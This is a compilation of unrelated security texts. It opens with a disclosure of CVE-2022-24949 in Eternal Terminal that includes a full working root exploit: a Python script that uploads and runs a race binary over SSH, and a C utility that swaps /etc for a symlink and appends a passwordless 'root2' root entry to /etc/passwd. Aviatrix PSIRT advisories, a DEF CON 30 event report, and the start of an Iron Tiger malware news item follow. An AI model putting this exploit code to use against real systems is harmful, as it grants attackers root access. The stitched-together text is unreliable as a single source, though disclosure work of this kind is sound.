A privilege escalation to root exists in Eternal Terminal prior to version 6.2.0. This is due to the combination of a race condition, buffer overflow, and logic bug all in PipeSocketHandler::listen().

**Vulnerability Description:**

An authenticated attacker can send a crafted packet to an Eternal Terminal server which allows them to change the ownership permissions on an arbitrary file. This can be leveraged to gain root privileges on the server.

This was due to a combination of a race condition and a buffer overflow in PipeSocketHandler::listen() as well as a logic bug in the PortForwardHandler:createSource().

The logic bug: If you send a crafted InitialPayload packet containing a PortForwardSourceRequest and arbitrary SocketEndpoint you can invoke a call to PipeSocketHandler::listen() with the arbitrary SocketEndpoint. The name member variable of the SocketEndpoint is used by several system calls in PipeSocketHandler::listen() including unlink(), resulting in arbitrary file delete.

The race condition: Inside PipeSocketHandler::listen(), there are subsequent calls to unlink(), bind(), chmod(), and chown(), to the provided name member variable of SocketEndpoint without verifying the path. If an attacker can modify the file pointed to by the provided name variable (through symlink manipulation for example) between bind() and chmod()/chown(), they can arbitrarily change a file's permission and ownership. I was able to utilize this vulnerability to arbitrarily change the permissions on /etc/passwd, thus resulting in a root privilege escalation. However I found the race condition by itself was not reliable.

The buffer overflow: Inside PipeSocketHandler::listen(), there are no bounds checks on a strcpy() which takes the provided name variable and copies it into the local.sun_path member variable of a socket. The maximum path length for this field is 108 characters, but there is no limit on the size of the name variable, allowing for a stack-based buffer overflow. This could be utilized in a traditional memory corruption exploit (i.e. overwriting return addresses and controlling code execution), but would require additional work in order to prevent failure during the function and the epilog of the function (i.e. the fd variable needs to be valid for bind() and listen(), the pipePath variable needs to point to a crafted fake chunk in order to be freed properly during the function epilog). In this case I abused a discrepancy between path handling in bind(), where it truncates the provided path to 108 characters even if the member variable is longer. By overflowing the local.sun_path I can have the the bind() call point to a different path, which prevents a failure if the file already exists.

In the final exploit I use the name variable of /../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/aaa/etc/passwd, and the race utility creates a large file for unlink in order to improve race condition reliability. In order to run the proof of concept compile the .proto file with protoc, compile the race utility statically for your target and run it locally on the target, and run the python script remotely against the target. This will change the ownership of /etc/passwd on the target machine and create the user root2 which does not require a password to login to.

**Proof of Concept:**

This python file should be run remotely against the ET target.

    #!/usr/bin/env python3
    
    import argparse
    import struct
    import time
    import socket
    import paramiko
    import ET_pb2
    
    PROTOCOL_VERSION = 6
    INITIAL_PAYLOAD = 253
    HEADER_SIZE = 2
    
    parser = argparse.ArgumentParser(description='[*] Root privesc exploit for Eternal Terminal, \
                                                  assumes SSH access to box')
    parser.add_argument('host',type=str,help='target machine')
    parser.add_argument('user',type=str,help='user to SSH as')
    parser.add_argument('--etport',type=int,default='2022',help='port ET is running on')
    parser.add_argument('--sshport',type=int,default='22',help='port SSH is running on')
    parser.add_argument('--racepath',type=str,default='./race',help='location of race utility')
    args = parser.parse_args()
    
    #Initializes SSH/SFTP connection
    def initialize_ssh_connection(host, user, ssh_port):
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(host,ssh_port,username=user,timeout=4)
        return ssh
    
    def initiate_client_connection(id, connection):
        #Craft request
        connect_request = ET_pb2.ConnectRequest()
        connect_request.clientId = id
        connect_request.version = PROTOCOL_VERSION
    
        request = connect_request.SerializeToString()
        length = struct.pack('l', len(request))
        #Send Request
        connection.sendall(length)
        connection.sendall(request)
    
    # Send static initial payload, this was pulled from a client communication but could be
    # dynamically constructed as well
    def send_initial_payload(connection, key):
        """
    [INFO 2021-10-27 08:35:43,553 client-main BackedWriter.cpp:17] Hexdump of payload
    000000: 00 00 00 94 01 fd 5f f2 04 d1 66 43 5a 64 44 1e  ......_...fCZdD.
    000010: 54 8f c8 fa 3f 4f 8a e9 c2 03 a0 86 0a 51 cb 37  T...?O.......Q.7
    000020: 7d 95 10 0f 64 8b 2b 1a 2c 7c ac 79 df f9 8b 50  }...d.+.,|.y...P
    000030: 15 7e 5a 5e fb d7 3a 81 65 66 aa 21 80 56 9b 67  .~Z^..:.ef.!.V.g
    000040: 8b be 1a fd 85 2e 90 ee 16 46 e8 c7 17 23 a2 d5  .........F...#..
    000050: 27 0c 1d 9c ae fe 3b 47 2b 0f 09 3e a6 31 f9 6d  '.....;G+..>.1.m
    000060: ee df c1 65 63 55 26 ae e5 11 5d a9 df 15 d7 45  ...ecU&...]....E
    000070: 12 a4 df 3e 8f 40 54 51 ab 2c 8a 0d 88 ae 3d 44  ...>.@TQ.,....=D
    000080: c5 0c 2a c5 0a bc 60 48 df 01 f8 70 fb be dc 62  ..*...`H...p...b
    000090: cb 36 a4 42 11 5c fc ac                          .6.B.\..
    
        #Example python code which would generate the payload
        initial_payload = ETerminal_pb2.InitialPayload()
        initial_payload.jumphost = False
        port_forward_source_request = ETerminal_pb2.PortForwardSourceRequest()
        source = ET_pb2.SocketEndpoint()
        destination = ET_pb2.SocketEndpoint()
        sourcePath = '/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/aaa/etc/passwd'
        destinationPath = '/tmp/test'
        source.name = sourcePath
        destination.name = destinationPath
        port_forward_source_request.source.CopyFrom(source)
        port_forward_source_request.destination.CopyFrom(destination)
        #initial_payload.reversetunnels = [port_forward_source_request]
        initial_payload.reversetunnels.append(port_forward_source_request)
        serialized_payload = initial_payload.SerializeToString()
    """
    
        packet = bytes.fromhex("00 00 00 94 01 fd 5f f2 04 d1 66 43 5a 64 44 1e 54 \
        8f c8 fa 3f 4f 8a e9 c2 03 a0 86 0a 51 cb 37 7d 95 10 0f 64 8b 2b 1a 2c 7c \
        ac 79 df f9 8b 50 15 7e 5a 5e fb d7 3a 81 65 66 aa 21 80 56 9b 67 8b be 1a \
        fd 85 2e 90 ee 16 46 e8 c7 17 23 a2 d5 27 0c 1d 9c ae fe 3b 47 2b 0f 09 3e \
        a6 31 f9 6d ee df c1 65 63 55 26 ae e5 11 5d a9 df 15 d7 45 12 a4 df 3e 8f \
        40 54 51 ab 2c 8a 0d 88 ae 3d 44 c5 0c 2a c5 0a bc 60 48 df 01 f8 70 fb be \
        dc 62 cb 36 a4 42 11 5c fc ac")
        connection.sendall(packet)
    
    if __name__ == "__main__":
        #Initialize SSH/SFTP connection
        print("[*] Initializing SSH connection")
        ssh = initialize_ssh_connection(args.host, args.user, args.sshport)
        print("[*] Initializing SFTP connection")
        sftp = initialize_ssh_connection(args.host, args.user, args.sshport).open_sftp()
    
    
        #Clean up previous race binary
        print("[*] Cleaning up previous race binary")
        stdin, stdout, stderr = ssh.exec_command('rm -rf ~/race')
        exit_status = stdout.channel.recv_exit_status()
        #print(stdout.read().splitlines())
    
        print("[*] Killing previous race processes")
        stdin, stdout, stderr = ssh.exec_command('pkill race')
        exit_status = stdout.channel.recv_exit_status()
    
        #Get home directory
        print("[*] Getting home directory")
        stdin, stdout, stderr = ssh.exec_command('echo $HOME')
        exit_status = stdout.channel.recv_exit_status()
        home = stdout.read().splitlines()[0].decode('utf-8')
    
        #Copy new binary over
        print("[*] Copying new race binary over")
        sftp.put(args.racepath, f'{home}/race')
    
        #Run race binary
        print("[*] Running race utility in background")
        stdin, stdout, stderr = ssh.exec_command(f'chmod +x {home}/race && {home}/race&')
        exit_status = stdout.channel.recv_exit_status()
        #TODO: modify to wait for return from race binary to create 2.0G passwd file
        time.sleep(5)
    
        #Registering random id/key
        print("[*] Registering id/key on ET server")
        id = '25F81F3CC230D45B'
        key = 'E59AD03E34FC3AB9DED568F47EA27677'
        cmd = f'echo \'{id}/{key}_xterm-256color\n\' | etterminal&'
        stdin, stdout, stderr = ssh.exec_command(cmd)
        exit_status = stdout.channel.recv_exit_status()
        stdout.read().splitlines()
    
        #Setup ET socket connetion
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as connection:
    
            connection.connect((args.host, args.etport))
            print("[*] Initiating client connection")
            initiate_client_connection(id, connection) #TerminalClient.cpp:140
            print("[*] Sending payload")
            send_initial_payload(connection, key)
            print("[*] You can log in as root2 on the target machine without a password, try it!")
    

This C file should be compiled statically and run locally on the target server.

    #include <sys/inotify.h>
    #include <stdio.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <signal.h>
    #include <fcntl.h>
    #include <string.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    
    #define EVENT_SIZE  ( sizeof (struct inotify_event) ) /*size of one event*/
    #define MAX_EVENTS 4096/* Maximum number of events to process*/
    #define LEN_NAME 4  /* Assuming that the length of the filename */
    #define BUF_LEN     ( MAX_EVENTS * ( EVENT_SIZE + LEN_NAME ))
    
    int fd,wd;
    void sig_handler(int sig){
           inotify_rm_watch( fd, wd );
           close( fd );
           exit( 0 );
    }
    
    int main(int argc, char *argv[])
    {
    	//Cleanup previous exploit attempts
    	printf("[*] Cleaning up previous exploit attempts\n");
    	system("/bin/rm -rf /tmp/aaa");
    	system("mkdir -p /tmp/aaa/etc");
    	system("touch /tmp/aaa/etc/passwd");
    	printf("[*] Making large file for unlink race\n");
    	system("yes | dd of=/tmp/aaa/etc/passwd bs=1M iflag=fullblock count=2048");
    
        // watch the tmp/aaa/etc folder for the creation of the socket file
        char *path = "/tmp/aaa/etc";
        signal(SIGINT,sig_handler);
    
        fd = inotify_init();
    
        if (fcntl(fd, F_SETFL, O_NONBLOCK) < 0)
        exit(2);
    
        wd = inotify_add_watch(fd,path,IN_DELETE);
        if(wd==-1){
    	printf("Could not watch\n");
        }
        else {
    	printf("Watching...\n");
        }
    
        while(1) {
    	int i=0, length;
    	char buffer[BUF_LEN];
    
    	length = read(fd,buffer,BUF_LEN);
    
    	while(i<length){
    	    struct inotify_event *event = (struct inotify_event *) &buffer[i];
    		if(event->len){
    		    if (strcmp(event-> name,"passwd") == 0) {
    			if ( event->mask & IN_DELETE ) {
    			    rename("/tmp/aaa/etc", "/tmp/aaa/etcc");
    			    symlink("/etc", "/tmp/aaa/etc");
    
    			    printf("[*] Waiting to overwrite /etc/passwd\n");
    			    int i = 0;
    			    while(i < 3) {
    
    				if (access("/etc/passwd", W_OK)  == 0) {
    				    // Add malicious entry to passwd and login as user
    				    printf("[*] Adding entry root2 with no password");
    				    char * entry = "root2::0:0:root:/root:/bin/bash";
    				    FILE * pFile = fopen("/etc/passwd", "a");
    				    fprintf(pFile, entry);
    				    fclose(pFile);
    				    exit(1);
    				}
    				printf("[*] Waiting...\n");
    				sleep(1);
    				i = i + 1;
    			    }
    			    printf("[*] Something went wrong, try again!\n");
    			    exit(-1);
    			}
    			}
    		    
    		    i += EVENT_SIZE + event->len;
    		}
    	}
    }
    }
    

This protobuf file should be compiled using protoc and used as a reference for the python file.

    //ET.proto
    syntax = "proto2";
    package et;
    option optimize_for = LITE_RUNTIME;
    
    enum EtPacketType {
      // Count down from 254 to avoid collisions
      HEARTBEAT = 254;
      INITIAL_PAYLOAD = 253;
      INITIAL_RESPONSE = 252;
    }
    
    message ConnectRequest {
      optional string clientId = 1;
      optional int32 version = 2;
    }
    
    enum ConnectStatus {
      NEW_CLIENT = 1;
      RETURNING_CLIENT = 2;
      INVALID_KEY = 3;
      MISMATCHED_PROTOCOL = 4;
    }
    
    message ConnectResponse {
      optional ConnectStatus status = 1;
      optional string error = 2;
    }
    
    message SequenceHeader { optional int32 sequenceNumber = 1; }
    
    message CatchupBuffer { repeated bytes buffer = 1; }
    
    message SocketEndpoint {
      optional string name = 1;
      optional int32 port = 2;
    }
    

**Timeline:**

10/29/21: Vulnerabilities were disclosed to author of ET  
11/3/21: Partial fixes for the most serious issues to ET were released (including this one)  
1/27/22: 90 day deadline for public disclosure reached

CVE-2022-24949: Eternal Terminal Root Privilege Escalation

An issue was discovered in Aviatrix Gateway before 6.6.5712 and 6.7.x before 6.7.1376. Because Gateway API functions mishandle authentication, an authenticated VPN user can inject arbitrary commands.

Aviatrix Product Security Team continually tests the software product, looking for vulnerabilities and weaknesses. If you have a security issue to report, please open a support ticket at Aviatrix Support Portal at https://support.aviatrix.com. Any such findings are fed back to Aviatrix’s development teams and serious issues are described along with protective solutions in the advisories below.

Please note the below Aviatrix Security recommendations and communication plans: - Aviatrix strongly recommend customers to stay on the latest release to resolve features and bug issues. All fixes are in the new release; we do not patch older release versions. - Customers are strongly recommended to perform image migration 2x a year. The migration process provides the latest system level security patch - All known software vulerabilities are submitted to Mitre for CVE-ID references by Aviatrix Systems - Avitrix publish Field Notices and send alerts to Controller Admin in the Controller console when security related issues are published

**23\. Aviatrix Controller and Gateways - Unauthorized Access¶**

**Date** 08/02/2022

**Risk Rating** High for Gateways.

**Description** Gateway APIs contain functions that are inappropriately authenticated and would allow an authenticated VPN user to inject arbitrary commands.

**Impact** A successful attack would allow an authenticated VPN user to execute arbitrary comments against Aviatrix gateways.

**Affected Products** Aviatrix Gateways

**Solution** Upgrade your Aviatrix Controller and gateway software to:

*   6.6.5712 or later
*   6.7.1376 or later

**Acknowledgement** Aviatrix would like to thank Thomas Wallin from Splunk for the responsible disclosure of this issue.

**22\. Remote Code Execution¶**

**Date** 05/27/2022

**Risk Rating** AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (10.0)

**Description** Several vulnerabilities could be combined by an attacker to abuse a Gateway command mechanism that would allow arbitrary remote code execution. This vulnerability is not known to be exploited.

**Impact** An unauthenticated attacker to run arbitrary commands against Aviatrix gateways.

**Affected Products** Aviatrix Controller and Gateways.

**Solution: Upgrade your controller and gateway software to:**

*   6.4.3057
*   6.5.3233
*   6.6.5612
*   6.7.1185

**21\. Post-Auth Remote Code Execution¶**

**Date** 04/11/2022

**Risk Rating** High

**Description** TLDAP APIs contain functions that are inappropriately sanitized, and would allow an authenticated malicious user to inject arbitrary commands.

**Impact** A local user to the controller UI could execute arbitrary code.

**Affected Products** Aviatrix Controller.

**Solution: Upgrade your controller and gateway software to:**

*   6.4.3049
*   6.5.3166
*   6.6.5545

**20\. Aviatrix Controller and Gateways - Privilege Escalation¶**

**Date** 02/03/2022

**Risk Rating** Medium

**Description** The publicly disclosed CVE-2021-4034 and CVE-2022-0185 are local privilege escalation vulnerabilities disclosed in the past two weeks. When successfully executed, an attack exploiting these vulnerabilities can cause a local privilege escalation giving unprivileged users administrative rights on the target machine. The Aviatrix Gateway, Controller, and Copilot are all running vulnerable versions of the Linux packages. However, in order to successfully exploit these vulnerabilities, an attacker requires local access to our systems and no vulnerability known to us today would allow such attack.

**Impact** A local user to our appliances can escalate his privileges to root.

**Affected Products** Aviatrix Controller and Gateways.

**Solution**

*   Upgrade Copilot to Release 1.6.3.
*   Apply security patch \[AVI-2022-0001 - CVE-2021-4034 and CVE-2022-0185 Privilege Escalation Patches\] to controllers.

**19\. Aviatrix Controller and Gateways - Unauthorized Access¶**

**Date** 01/11/2022

**Risk Rating** High for Gateways, medium for Controller.

**Description** On the Aviatrix Controller, a successful attack would allow an unauthenticated remote attacker partial access to configuration information and allow them to disrupt the service. On the gateway, a successful attack would allow an unauthenticated network-adjacent attacker (i.e.: an attacker present on the gateway’s VPC) access to its API.

**Impact** Access to configuration information and disruption of service.

**Affected Products** Aviatrix Controller, Gateways and Copilot.

**Solution** Upgrade your controller and gateway software to:

*   6.4.2995 or later.
*   6.5.2898 or later.

**18\. Aviatrix Controller - Remote file execution¶**

**Date** 10/04/2021

**Risk Rating** Critical

**Description** The Aviatrix Controller legacy API had a vulnerability allowing an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem. These uploaded scripts will be processed by the web frontend, allowing an attacker to run code of their choosing.

**Impact** Remote file execution

**Affected Product** Aviatrix Controller prior to the fixed versions.

**Solution** The vulnerability has been fixed in:

> *   UserConnect-6.2-1804.2043 or later
> *   UserConnect-6.3-1804.2490 or later
> *   UserConnect-6.4-1804.2838 or later
> *   UserConnect-6.5-1804.1922 or later

**CVE-ID** CVE-2021-40870

**Acknowledgement** Aviatrix would like to thank the team at Tradecraft (https://www.wearetradecraft.com/) for the responsible disclosure of these issues.

**17\. OpenVPN - Abitrary File Write¶**

**Date** 8/10/2020

**Risk Rating** High

**Description** The VPN service write logs to a location that is writable

**Impact** Unauthorized file permission

**Affected Product** Aviatrix OpenVPN R2.8.2 or earlier

**Solution** Aviatrix OpenVPN OpenVPN 2.10.8 - May 14 2020 or later

**CVE-ID** TBD

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**16\. Bypass htaccess security control¶**

**Date** 8/10/2020

**Risk Rating** Low

**Description** The htaccess control to prevent requests to a cert directory can be bypassed to download files.

**Impact** Excessive Permission

**Affected Product** Controller 5.3.1516

**Solution** Controller R5.4.1290 (8/5/2020) or later

**CVE-ID** TBD

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**15\. Insecure File Permissions¶**

**Date** 8/10/2020

**Risk Rating** Medium

**Description** Several world writable files and directories were found

**Impact** Excessive Permission

**Affected Product** Controller 5.3.1516

**Solution** Controller R5.4.1290 (8/5/2020) or later

**CVE-ID** TBD

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**14\. Bypass Htaccess Security Control¶**

**Date** 8/10/2020

**Risk Rating** Low

**Description** The htaccess control to prevent requests to directories can be bypassed for file downloading.

**Impact** Unauthorized file download

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R5.4.1290 (8/5/2020) or later

**CVE-ID** CVE-2020-26549

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**13\. Insecure sudo rule¶**

**Date** 8/10/2020

**Risk Rating** Medium

**Description** A user account has permission to execute all commands access as any user on the system.

**Impact** Excessive permission

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R5.4.1290 (8/5/2020) or later

**CVE-ID** CVE-2020-26548

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**12\. Cleartext Ecryption Key Storage¶**

**Date** 8/10/2020

**Risk Rating** High

**Description** Encrypted key values are stored in cleartext in a readable file

**Impact** Access to read key in encrypted format

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R5.3.1151 (6/4/2020) or later Migration required to the latest AMI Software Version 050120 (Aug 13, 2020)

**CVE-ID** CVE-2020-26551

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**11\. Pre-Auth Account Takeover¶**

**Date** 8/10/2020

**Risk Rating** Critical

**Description** An API file does not require a valid session and allows for updates of account email addresses.

**Impact** Access to unauthorized files

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R5.4.1290 (8/5/2020) or later

**CVE-ID** CVE-2020-26552

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**10\. Post-Auth Remote Code Execution¶**

**Date** 8/10/2020

**Risk Rating** High

**Description** Several APIs contain functions that allow arbitrary files to be uploaded to the web tree.

**Impact** Access to unauthorized files

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R6.0.2483 (8/4/2020) or later

**CVE-ID** CVE-2020-26553

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**9\. Pre-Auth Remote Code Execution¶**

**Date** 8/10/2020

**Risk Rating** Critical

**Description** An API file does not require a valid session ID and allows arbitrary files to be uploaded to the web tree.

**Impact** Access to unauthorized files

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R6.0.2483 (8/4/2020) or later

**CVE-ID** CVE-2020-26553

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**8\. Insufficiently Protected Credentials¶**

**Date** 8/10/2020

**Risk Rating** Critical

**Description** An encrypted file containing credentials to unrelated systems is protected by a weak key.

**Impact** Encryption key may not meet the latest security standard

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade R5.3.1151 (6/4/2020) or later

**CVE-ID** CVE-2020-26550

**Acknowledgement** Aviatrix would like to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**7\. Observable Response Discrepancy from API¶**

**Date** 5/19/2020

**Risk Rating** Medium

**Description** The Aviatrix Cloud Controller appliance is vulnerable to a user enumeration vulnerability.

**Impact** A valid username could be used for brute force attack.

**Affected Product** Aviatrix Controller 5.3 or earlier

**Solution** Controller & Gateway upgrade 5.4.1204 (5/8/2020) or later

**CVE-ID** CVE-2020-13413

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**6\. OpenVPN Client - Elevation of Privilege¶**

**Date** 5/19/2020

**Risk Rating** High

**Description** The Aviatrix VPN client on Linux, macOS, and Windows is vulnerable to an Elevation of Privilege vulnerability. This vulnerability was previously reported (CVE-2020-7224), and a patch was released however the fix is incomplete.

**Impact** This would impact dangerous OpenSSL parameters code execution that are not authorized. Impacts macOS, Linux and Windows clients.

**Affected Product** Client VPN 2.8.2 or earlier Controller & Gateway 5.2 or earlier

**Solution** Client VPN upgrade to 2.10.7 Controller & Gateway upgrade to 5.3 or later In Controller, customer must configure OpenVPN minimum client version to 2.10.7

**CVE-ID** CVE-2020-13417

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**5\. Cross Site Request Forgery (CSRF)¶**

**Date** 5/12/2020

**Risk Rating** Critical

**Description** An API call on Aviatrix Controller web interface was found missing session token check to control access.

**Impact** Application may be vulnerable to Cross Site Request Forgery (CSRF)

**Affected Product** Aviatrix Controller with software release 5.3 or earlier

**Solution** Controller & Gateway upgrade 5.4.1204 (5/8/2020) or later

**CVE-ID** CVE-2020-13412

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**4\. Hard Coded Credentials¶**

**Date** 1/16/2020

**Risk Rating** Low

**Description** The Aviatrix Cloud Controller contains credentials unused by the software. This is a clean-up effort implemented to improve on operational and security maintenance.

**Impact** This would impact operation and maintenance complexity.

**Affected Product** Aviatrix Controller 5.3 or lower

**Solution** Controller & Gateway upgrade 5.4.1204 (5/8/2020) or later Recommended: AWS Security Group settings grants only authorized Controller Access in your environment

**CVE-ID** CVE-2020-13414

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**3\. CSRF on Password Reset¶**

**Date** 1/16/2020

**Risk Rating** Medium

**Description** Controller Web Interface session token parameter is not required on an API call, which opens the application up to a Cross Site Request Forgery (CSRF) vulnerability.

**Impact** Vulnerability could lead to the unintended reset of a user’s password.

**Affected Product** Aviatrix Controller 5.3 or lower

**Solution** Upgrade 5.4.1066 (must be on version is 5.0 or above) Make sure your AWS Security Group settings limit authorized Controller Access only

**CVE-ID** CVE-2020-13416

**2\. XML Signature Wrapping in SAML¶**

**Date** 2/26/2020

**Risk Rating** High

**Description** An attacker with any signed SAML assertion from the Identity Provider can establish a connection (even if that SAML assertion has expired or is from a user who is not authorized to access Aviatrix).

**Impact** Aviatrix customer using SAML

**Affected Product** Aviatrix Controller 5.1 or lower

**Solution** Aviatrix Controller 5.2 or later Plus Security Patch “SAML XML signature wrapping vulnerability”

**CVE-ID** CVE-2020-13415

**Acknowledgement** Aviatrix is pleased to thank Ioannis Kakavas from Elastic for reporting this vulnerability under responsible disclosure.

**1\. OpenVPN Client Arbitrary File Write¶**

**Date** 1/16/2020

**Risk Rating** High

**Description** Aviatrix OpenVPN client through 2.5.7 or older on Linux, MacOS, and Windows is vulnerable when OpenSSL parameters are altered from the issued value set; the parameters could allow unauthorized third-party libraries to load.

**Impact** OpenVPN client on Linux, MacOS, and Windows

**Affected Product** OpenVPN Client 2.5.7

**Solution** Upgrade to VPN client v2.6 or later

**CVE-ID** CVE-2020-7224

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

CVE-2022-38368: PSIRT Advisories — aviatrix_docs documentation

After 30 years and a brief pandemic hiatus, DEF CON returns with "Hacker Homecoming," an event that put the humans behind cybersecurity first.

DEF CON — Las Vegas — Halls stuffed with hackers lined up for hours for their chance to hone their skills on the latest tech, helped along by a volunteer army of so-called "goons" — it was a hopeful place to be last weekend during DEF CON 30.

Everyone wore masks so even the immunocompromised could participate. There was a trend toward focusing on using hacker powers to protect the population from utility breaches, smart car accidents, misinformation, and more. Giving the entire conference its reputational edge were rooms buzzing with information and the kind of immediacy and potency that made it feel almost subversive — punk rock, even.

Here are just a few of the highlights Dark Reading happened to find among the organized chaos that was DEF CON 30.

**1\. Merch Madness**

The longest lines, by many hours, were those to get the latest DEF CON-branded merchandise. While some used the time to refuel with snacks, others put a little more thought into the break in the action. Take Brad Lindsley, who made his own "Linecon Bag" with a mounted gaming screen and controllers for four players.

"I was waiting in line for hours at another DEF CON and I was thinking about what I would want to do in line," he told Dark Reading.

    

Brad Lindsley shows off his Linecon bag. (Photo by Becky Bracken for Dark Reading)

**2\. IoT Village**

DEF CON 30 hackers also had the option to ply their skills on dozens of Internet of Things (IoT) devices, including the Emergency Broadcast System and a Globecomm satellite system, thanks to the work of TIVO Trevor and the rest of the team, who spent the last 90 days building the IoT common control framework (CCF).

Trevor said that this year the IoT Village made the decision to shift its emphasis because of the shifting threat landscape that now focuses on infrastructure and other IoT devices.

"We've moved away from SOHO (small offices/home offices) to IoT this year," he told Dark Reading.

    

TIVO Trevor at the DEF CON 30 IoT Village. (Photo by Becky Bracken for Dark Reading)

**3\. Sink This Battleship**

There were too many contests going on during DEF CON 30 to count. One big one was a version of Capture the Flag called "Can You Sink the Ship?" put on by Fathom5, which challenged teams of hackers to bring down their ship training module. The kickoff was preceded by more than a few rules laid out by Fathom5 CTO David Burke, who included an instruction not to tinker with the hoses underneath: "Please don't spray hydraulic fluid everywhere around the room."

    

Burke explains the ground rules of the contest. (Photo by Becky Bracken for Dark Reading)

**4\. Other Challenges Accepted**

Other, less elaborate contests included a collection of Capture the Flag versions, Red Team challenges, and even a DEF CON Scavenger Hunt.

    

One of the many contest leaderboards projected around the DEF CON Contest Village. (Photo by Becky Bracken for Dark Reading)

**5\. The Voting Village**

Noted voting-machine researcher Harri Hursti, representing the Election Integrity Foundation, brought in a collection of voting machines currently in use across the US for hackers and conspiracy theorists alike to try out and challenge their security.

Dark Reading ran into a group of hackers giving one of the US voting machines a careful look. Asked if they thought they might be able to crack into it, one of the group responded, "I don't know if we can, but it's fun thing to play with."

    

Voting machine hackers, from L to R: Wkampbel, Segzf4ult, Cole Knight, James, Semifour. (Photo by Becky Bracken for Dark Reading)

**6\. The Signage**

Even the signage spread out around DEF CON 30 was flair-forward, with an array of clever quips, dazzling digital renderings, and just straight-up art. Here is just the tiniest taste of what was on display.

    

The Chill Out Room at DEF CON had an elaborate stage for DJs and performances. (Photo by Becky Bracken for Dark Reading)

    

Signage at the lock-picking area at DEF CON. (Photo by Becky Bracken for Dark Reading)

    

Wall projection over main DEF CON 30 entrance. (Photo by Becky Bracken for Dark Reading)

**7\. Brain Hacking & Misinformation**

An entire village at this year's DEF CON was dedicated to misinformation. With phishing and social engineering still driving so many successful cyberattacks, Dr. Matthew Canham of Beyond Layer 7 gave a presentation on cognitive security, which essentially means blocking attackers from compromising the brain itself. From optical illusions to instances like Cambridge Analytica's practice of building psychographic profiles to target victims, brain hacks are here and getting more sophisticated, according to Dr. Canham.

    

Misinformation Village information screen prior to Dr. Canham's presentation. (Photo by Becky Bracken for Dark Reading)

**8\. The Traditions**

This year was Michael Bargury's debut on the DEF CON stage. That meant that before he kicked off his presentation about codeless malware, the CTO and cofounder of Zenity (and Dark Reading columnist) engaged in a DEF CON tradition... he did a shot, along with his "goon" who gave the introduction. After a few seconds and just one wince while the liquor went down, Bargury was officially inaugurated into the DEF CON speaker's club and ready to go.

    

Bargury takes the podium following his inaugural shot of courage. (Photo by Becky Bracken for Dark Reading)

DEF CON 30: Hackers Come Home to Vibrant Community

By Deeba Ahmed
Chinese Espionage Group called Iron Tiger (aka LuckyMouse) is targeting Windows, Linux, and macOS Users with trojanized MiMi…
This is a post from HackRead.com Read the original post: Windows, Linux and macOS Users Targeted by Chinese Iron Tiger APT Group

****Chinese Espionage Group called Iron Tiger (aka LuckyMouse) is targeting Windows, Linux, and macOS Users with trojanized MiMi Chat app installers.****

Cybersecurity firms Trend Micro and SEKOIA have identified a new malware campaign from Iron Tiger, a Chinese APT group also known as Emissary Panda, Goblin Panda Conimes, Cycldek, Bronze Union, LuckyMouse, APT27, and Threat Group 3390 (TG-3390).

The China-linked cyberespionage group is targeting Windows, Linux, macOS, and iOS users through trojanized versions of MiMi chat app installers. The primary targets of Iron Tiger in this campaign were located in Taiwan and the Philippines.

Trend Micro could identify one of the victims, a Taiwan-based gaming development firm, while overall, thirteen entities were targeted.

**Detailed Analysis of Iron Tiger Spying Campaign**

